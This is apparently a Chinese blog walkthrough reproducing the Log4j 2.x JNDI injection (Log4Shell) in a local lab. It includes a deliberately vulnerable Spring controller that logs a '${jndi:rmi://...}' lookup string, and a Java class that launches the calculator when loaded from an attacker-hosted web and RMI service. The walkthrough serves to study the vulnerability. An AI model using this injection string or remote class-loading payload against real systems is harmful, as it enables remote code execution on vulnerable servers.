log4j-core 2.7
log4j-api 2.7
jdk 1.8
核心的漏洞代码在于org.apache.logging.log4j.core.lookup.StrSubstitutor 该类中,首先利用idea 全局搜索以下方法。
protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf, final int startPos, final int endPos) { final StrLookup resolver = getVariableResolver(); if (resolver == null) { return null; } return resolver.lookup(event, variableName); }
并在关键位置打断点
方法执行到该处才算成功。
被攻击服务,其主要代码如下:
import org.apache.log4j.Logger; import org.springframework.stereotype.Controller; import org.springframework.ui.Model; import org.springframework.web.bind.annotation.RequestMapping; import javax.servlet.http.HttpServletResponse; @Controller @RequestMapping("Test") public class TestController { Logger log = Logger.getLogger(TestController.class); @RequestMapping("/test") public String index(Model model, HttpServletResponse response) { log.info("${jndi:rmi://127.0.0.1:1099/Test}"); //指向rmi服务 return "index"; } }
主要步骤: 攻击者服务需要一个web服务存放执行脚本,然后再用rmi指向该web服务。
利用Python开启一个简单的web服务,并放上攻击脚本,放在其目录下:
打开计算器的脚本:
public class MyServer { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"calc"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { } } }
再用rmi指向该服务
最后执行被攻击者的代码,可以通过web发起http请求:
主要看是否进入断点,最好不要同时引入logback.jar这个包,要不然跳不进断点。最终d出计算器:
仅供学习交流!!!
参考:
[1]: https://www.cnblogs.com/wbo112/p/15690699.html
[2]: https://zhuanlan.zhihu.com/p/443640671
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)